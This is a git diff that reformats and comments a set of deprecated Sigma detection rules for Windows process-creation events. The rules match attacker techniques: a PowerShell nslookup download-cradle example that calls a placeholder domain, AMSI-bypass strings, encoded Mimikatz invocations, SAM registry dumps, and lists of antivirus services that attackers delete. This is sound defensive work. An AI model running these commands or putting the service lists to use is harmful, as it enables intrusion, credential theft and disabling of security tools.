status: deprecated -description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary - to execute arbitrary commands as seen in CVE-2022-30190 +description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 references: - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0 @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - NewProcessName|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' /cab' - ' -cab' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/deprecated/proc_creation_win_new_service_creation.yml b/sigma/builtin/deprecated/proc_creation_win_new_service_creation.yml index f31be5f54..507e52d18 100644 --- a/sigma/builtin/deprecated/proc_creation_win_new_service_creation.yml +++ b/sigma/builtin/deprecated/proc_creation_win_new_service_creation.yml @@ -19,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_sc: - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe selection_posh: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml b/sigma/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml index 66d0b2337..1fbb4098f 100644 --- a/sigma/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/sigma/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -1,13 +1,12 @@ title: Nslookup PwSh Download Cradle id: 72671447-4352-4413-bb91-b85569687135 status: deprecated -description: This rule tries to detect powershell download cradles, e.g. powershell - . (nslookup -q=txt http://some.owned.domain.com)[-1] +description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] references: - https://twitter.com/alh4zr3d/status/1566489367232651264 author: Zach Mathis (@yamatosecurity) date: 2022/09/06 -modified: 2022/12/14 +modified: 2022/12/14 # Deprecation date tags: - attack.command_and_control - attack.t1105 @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '=txt ' + CommandLine|contains: '=txt ' ParentProcessName|endswith: \powershell.exe - NewProcessName|contains: nslookup + NewProcessName|contains: nslookup condition: process_creation and selection level: medium ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml b/sigma/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml index 0033c3d73..05c5cab7c 100644 --- a/sigma/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml +++ b/sigma/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_1_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_1_cli: - CommandLine|contains: + CommandLine|contains: - -a - -f - /a @@ -33,8 +33,8 @@ detection: selection_2_parent: ParentProcessName|endswith: \odbcconf.exe selection_2_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE condition: process_creation and (all of selection_1_* or all of selection_2_*) falsepositives: - Legitimate use of odbcconf.exe by legitimate user diff --git a/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml b/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml index bad4c2761..d2f34387b 100644 --- a/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml +++ b/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml @@ -1,17 +1,11 @@ title: Excel Proxy Executing Regsvr32 With Payload id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 status: deprecated -description: 'Excel called wmic to finally proxy execute regsvr32 with the payload. - +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). - - But we have command-line in the event which allow us to "restore" this suspicious - parent-child chain and detect it. - - Monitor process creation with "wmic process call create" and LOLBins in command-line - with parent Office application processes. - - ' + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -28,20 +22,21 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_other: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - msiexec - mshta - verclsid - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call diff --git a/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml b/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml index 41b4c3100..087eabaa7 100644 --- a/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml +++ b/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml @@ -1,17 +1,11 @@ title: Excel Proxy Executing Regsvr32 With Payload Alternate id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 status: deprecated -description: 'Excel called wmic to finally proxy execute regsvr32 with the payload. - +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). - - But we have command-line in the event which allow us to "restore" this suspicious - parent-child chain and detect it. - - Monitor process creation with "wmic process call create" and LOLBins in command-line - with parent Office application processes. - - ' + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -28,26 +22,27 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - msiexec - mshta - verclsid selection2: - - NewProcessName|endswith: \wbem\WMIC.exe - - CommandLine|contains: 'wmic ' + - NewProcessName|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' selection3: ParentProcessName|endswith: - \winword.exe - \excel.exe - \powerpnt.exe selection4: - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call diff --git a/sigma/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml b/sigma/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml index f98a1ea4a..cca7a403b 100644 --- a/sigma/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml +++ b/sigma/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml @@ -1,8 +1,7 @@ title: Office Applications Spawning Wmi Cli Alternate id: 04f5363a-6bca-42ff-be70-0d28bf629ead status: deprecated -description: Initial execution of malicious document calls wmic to execute the file - with regsvr32 +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -19,12 +18,13 @@ logsource: product: windows category: process_creation detection: + #useful_information: Add more office applications to the rule logic of choice process_creation: EventID: 4688 Channel: Security selection1: - - NewProcessName|endswith: \wbem\WMIC.exe - - CommandLine|contains: 'wmic ' + - NewProcessName|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' selection2: ParentProcessName|endswith: - \winword.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml b/sigma/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml index a4ad6e1f8..e05210ee9 100644 --- a/sigma/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml +++ b/sigma/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml @@ -1,8 +1,7 @@ title: Possible Applocker Bypass id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719 status: deprecated -description: Detects execution of executables that can be used to bypass Applocker - whitelisting +description: Detects execution of executables that can be used to bypass Applocker whitelisting references: - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ @@ -16,7 +15,7 @@ tags: - attack.t1218.009 - attack.t1127.001 - attack.t1218.005 - - attack.t1218 + - attack.t1218 # no way to map 1:1, so the technique level is required logsource: category: process_creation product: windows @@ -25,18 +24,19 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - \msdt.exe - \installutil.exe - \regsvcs.exe - \regasm.exe + #- '\regsvr32.exe' # too many FPs, very noisy - \msbuild.exe - \ieexec.exe + #- '\mshta.exe' + #- '\csc.exe' condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment - - Using installutil to add features for .NET applications (primarily would occur - in developer environments) + - False positives depend on scripts and administrative tools used in the monitored environment + - Using installutil to add features for .NET applications (primarily would occur in developer environments) level: low ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml index 9102e52e3..fdf71a4fa 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml @@ -1,8 +1,7 @@ title: PowerShell AMSI Bypass Pattern id: 4f927692-68b5-4267-871b-073c45f4f6fe status: deprecated -description: Detects attempts to disable AMSI in the command line. It is possible - to bypass AMSI by disabling it before loading the main payload. +description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. author: '@Kostastsale' references: - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ @@ -20,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - '[Ref].Assembly.GetType' - SetValue($null,$true) - NonPublic,Static - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \powershell_ise.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml index bca607ab3..2f8e5e3c7 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml @@ -1,11 +1,10 @@ title: Malicious Base64 Encoded Powershell Invoke Cmdlets id: fd6e2919-3936-40c9-99db-0aa922c356f7 related: - - id: 6385697e-9f1b-40bd-8817-f4a91f40508e - type: similar + - id: 6385697e-9f1b-40bd-8817-f4a91f40508e + type: similar status: deprecated -description: Detects base64 encoded powershell cmdlet invocation of known suspicious - cmdlets +description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ author: pH-T (Nextron Systems) @@ -24,13 +23,16 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Invoke-BloodHound - SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA - kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA - JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA + # Invoke-Mimikatz - SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA - kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A - JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg + # Invoke-WMIExec - SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA - kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw - JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml index cdcda248c..1f5d86614 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml @@ -20,7 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + # Win32_Shadowcopy | ForEach-Object + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml index 5868a59a5..b62565a5e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - OiCAAAAYInlM - OiJAAAAYInlM condition: process_creation and selection diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml index 1560f9109..5e4c46a95 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml @@ -20,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: Start-BitsTransfer - NewProcessName|endswith: + CommandLine|contains: Start-BitsTransfer + NewProcessName|endswith: - \powershell.exe - \pwsh.exe condition: process_creation and selection diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_service_modification.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_service_modification.yml index c0bd099a7..358f7499e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_service_modification.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_service_modification.yml @@ -1,13 +1,9 @@ title: Stop Or Remove Antivirus Service id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b status: deprecated -description: 'Detects usage of ''Stop-Service'' or ''Remove-Service'' powershell cmdlet - to disable AV services. - - Adversaries may disable security tools to avoid possible detection of their tools - and activities by stopping antivirus service - - ' +description: | + Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. + Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ @@ -25,11 +21,12 @@ detection: EventID: 4688 Channel: Security selection_action: - CommandLine|contains: + CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_product: - CommandLine|contains: + CommandLine|contains: + # Feel free to add more service name - ' McAfeeDLPAgentService' - ' Trend Micro Deep Security Manager' - ' TMBMServer' diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml index 7c04b8b88..36826b2d0 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml @@ -1,12 +1,10 @@ title: Potential Xor Encoded PowerShell Command id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 related: - - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f - type: similar + - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f + type: similar status: deprecated -description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. - This pattern is often found in encoded powershell code and commands as a way to - avoid detection +description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton @@ -25,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.exe - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.exe + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ForEach - Xor condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/deprecated/proc_creation_win_reg_dump_sam.yml b/sigma/builtin/deprecated/proc_creation_win_reg_dump_sam.yml index c44d55ac3..a8388671b 100644 --- a/sigma/builtin/deprecated/proc_creation_win_reg_dump_sam.yml +++ b/sigma/builtin/deprecated/proc_creation_win_reg_dump_sam.yml @@ -1,12 +1,10 @@ title: Registry Dump of SAM Creds and Secrets id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e related: - - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 - type: similar + - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 + type: similar status: deprecated -description: Adversaries may attempt to extract credential material from the Security - Account Manager (SAM) database either through Windows Registry where the SAM database - is stored +description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets author: frack113 @@ -23,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection_reg: - CommandLine|contains: ' save ' + CommandLine|contains: ' save ' selection_key: - CommandLine|contains: + CommandLine|contains: - HKLM\sam - HKLM\system - HKLM\security diff --git a/sigma/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml b/sigma/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml index 5ac7f8ddd..759fd565e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml +++ b/sigma/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml @@ -21,47 +21,47 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: \Temp\ - NewProcessName|endswith: \regsvr32.exe + CommandLine|contains: \Temp\ + NewProcessName|endswith: \regsvr32.exe selection2: - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe ParentProcessName|endswith: - \powershell.exe - \pwsh.exe - \powershell_ise.exe selection3: - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe ParentProcessName|endswith: \cmd.exe selection4a: - CommandLine|contains|all: + CommandLine|contains|all: - '/i:' - http - CommandLine|endswith: scrobj.dll - NewProcessName|endswith: \regsvr32.exe + CommandLine|endswith: scrobj.dll + NewProcessName|endswith: \regsvr32.exe selection4b: - CommandLine|contains|all: + CommandLine|contains|all: - '/i:' - ftp - CommandLine|endswith: scrobj.dll - NewProcessName|endswith: \regsvr32.exe + CommandLine|endswith: scrobj.dll + NewProcessName|endswith: \regsvr32.exe selection5: - NewProcessName|endswith: + NewProcessName|endswith: - \cscript.exe - \wscript.exe ParentProcessName|endswith: \regsvr32.exe selection6: - CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' - NewProcessName|endswith: \EXCEL.EXE + CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' + NewProcessName|endswith: \EXCEL.EXE selection7: ParentProcessName|endswith: \mshta.exe - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe selection8: - CommandLine|contains: + CommandLine|contains: - \AppData\Local - C:\Users\Public - NewProcessName|endswith: \regsvr32.exe - selection9: - CommandLine|endswith: + NewProcessName|endswith: \regsvr32.exe + selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 + CommandLine|endswith: - .jpg - .jpeg - .png @@ -70,16 +70,16 @@ detection: - .tmp - .temp - .txt - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter1: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Microsoft\Teams - \AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll filter2: - CommandLine|contains: \Program Files\Box\Box\Temp\ + CommandLine|contains: \Program Files\Box\Box\Temp\ ParentProcessName: C:\Program Files\Box\Box\FS\streem.exe filter_legitimate: - CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll + CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll condition: process_creation and (1 of selection* and not 1 of filter*) fields: - CommandLine diff --git a/sigma/builtin/deprecated/proc_creation_win_renamed_paexec.yml b/sigma/builtin/deprecated/proc_creation_win_renamed_paexec.yml index 3edf083c9..7923e73d0 100644 --- a/sigma/builtin/deprecated/proc_creation_win_renamed_paexec.yml +++ b/sigma/builtin/deprecated/proc_creation_win_renamed_paexec.yml @@ -1,8 +1,7 @@ title: Renamed PaExec Execution id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b status: deprecated -description: Detects execution of renamed paexec via imphash and executable product - string +description: Detects execution of renamed paexec via imphash and executable product string references: - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf @@ -24,19 +23,19 @@ detection: EventID: 4688 Channel: Security selection: - - Product|contains: PAExec - - Imphash: - - 11D40A7B7876288F919AB819CC2D9802 - - 6444f8a34e99b8f7d9647de66aabe516 - - dfd6aa3f7b2b1035b76b718f1ddc689f - - 1a6cca4d5460b1710a12dea39e4a592c - - Hashes|contains: - - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: - NewProcessName|contains: paexec + NewProcessName|contains: paexec condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_root_certificate_installed.yml b/sigma/builtin/deprecated/proc_creation_win_root_certificate_installed.yml index a3029c330..3de7a8d9e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_root_certificate_installed.yml +++ b/sigma/builtin/deprecated/proc_creation_win_root_certificate_installed.yml @@ -1,11 +1,10 @@ title: Root Certificate Installed id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived status: deprecated -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -22,18 +21,17 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - -addstore - root - NewProcessName|endswith: \certutil.exe + NewProcessName|endswith: \certutil.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - /add - root - NewProcessName|endswith: \CertMgr.exe + NewProcessName|endswith: \CertMgr.exe condition: process_creation and (selection1 or selection2) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_run_from_zip.yml b/sigma/builtin/deprecated/proc_creation_win_run_from_zip.yml index ce48f6428..90a1cad90 100644 --- a/sigma/builtin/deprecated/proc_creation_win_run_from_zip.yml +++ b/sigma/builtin/deprecated/proc_creation_win_run_from_zip.yml @@ -1,8 +1,7 @@ title: Run from a Zip File id: 1a70042a-6622-4a2b-8958-267625349abf status: deprecated -description: Payloads may be compressed, archived, or encrypted in order to avoid - detection +description: Payloads may be compressed, archived, or encrypted in order to avoid detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file author: frack113 @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: .zip\ + NewProcessName|contains: .zip\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml b/sigma/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml index 38ce91753..d41ee86f3 100644 --- a/sigma/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml +++ b/sigma/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml @@ -1,8 +1,7 @@ title: Suspicious Execution of Sc to Delete AV Services id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b status: deprecated -description: Detects when attackers use "sc.exe" to delete AV services from the system - in order to avoid detection +description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,18 +19,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains: ' delete ' + CommandLine|contains: ' delete ' selection_av_process: - CommandLine|contains: + CommandLine|contains: + # Delete Service 'AVG' - AvgAdminServer - AVG Antivirus - MBEndpointAgent + # Delete Service 'Malwarebytes' - MBAMService - MBCloudEA - avgAdminClient + # Delete Service 'Sophos' - SAVService - SAVAdminService - Sophos AutoUpdate Service @@ -54,11 +56,15 @@ detection: - Sophos Endpoint Defense Service - SophosFIM - swi_filter + # Delete Service 'FireBird' - FirebirdGuardianDefaultInstance - FirebirdServerDefaultInstance + # Delete Service 'Webroot' - WRSVC + # Delete Service 'ESET' - ekrn - ekrnEpsw + # Delete Service 'Kaspersky' - klim6 - AVP18.0.0 - KLIF @@ -71,6 +77,7 @@ detection: - klhk - KSDE1.0.0 - kltap + # Delete Service 'Quick Heal' - ScSecSvc - Core Mail Protection - Core Scanning Server @@ -79,11 +86,13 @@ detection: - RepairService - Core Browsing Protection - Quick Update Service + # Delete Service 'McAfee' - McAfeeFramework - macmnsvc - masvc - mfemms - mfevtp + # Delete Service 'Trend Micro' - TmFilter - TMLWCSService - tmusa @@ -98,6 +107,7 @@ detection: - ofcservice - TmPfw - PccNTUpd + # Delete Service 'Panda' - PandaAetherAgent - PSUAService - NanoServiceMain @@ -108,7 +118,6 @@ detection: - EPUpdateService condition: process_creation and (all of selection*) falsepositives: - - Legitimate software deleting using the same method of deletion (Add it to a - filter if you find cases as such) + - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such) level: high ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml 